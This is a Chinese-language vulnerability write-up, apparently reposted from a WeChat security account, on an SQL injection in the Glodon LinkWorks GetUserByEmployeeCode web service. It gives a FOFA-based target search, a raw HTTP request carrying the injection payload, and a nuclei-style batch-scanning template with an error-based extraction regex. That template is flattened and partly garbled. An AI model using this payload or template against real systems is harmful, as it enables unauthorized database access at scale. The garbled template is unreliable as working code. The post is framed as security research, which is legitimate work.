漏洞简介
广联达-linkworks-gwgdwebservice 存在SQL注入漏洞。
漏洞复现
第一步、使用下面fofa语句进行资产手机...确认测试目标
第二步、拼接下面路径使用burp进行抓包...抓到包后发送到Repeater中修改数据包进行漏洞测试
/Org/service/Service.asmx/GetUserByEmployeeCode
POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 41
employeeCode=1'-1/user--'&EncryptData=1
批量脚本
id: glodon-linkworks-service-sqli
info:
name: glodon-linkworks-service-sqli
author: unknow
severity: critical
description: glodon-linkworks-gwgdwebservice 存在SQL注入漏洞。
tags: glodon,sqli
metadata:
'header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"' :
http:
raw:
|
POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1
Host:
application/x-www-form-urlencoded :
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 :
employeeCode=1'-1/{{sqli}}--'&EncryptData=1
payloads:
sqli:
'user'
extractors:
type: regex
part: body
name: sqli
group: 1
regex:
'在将 nvarchar 值 '(.*)' 转换成数据类型 int 时失败。'
and :
matchers:
type: dsl
dsl:
'status_code_1==500 && contains(body_1, "在将 nvarchar 值") && contains(body_1, "转换成数据类型 int 时失败") '
#&& contains(header_1, "text/html")'
原文始发于微信公众号(揽月安全团队):广联达-linkworks-gwgdwebservice SQL注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论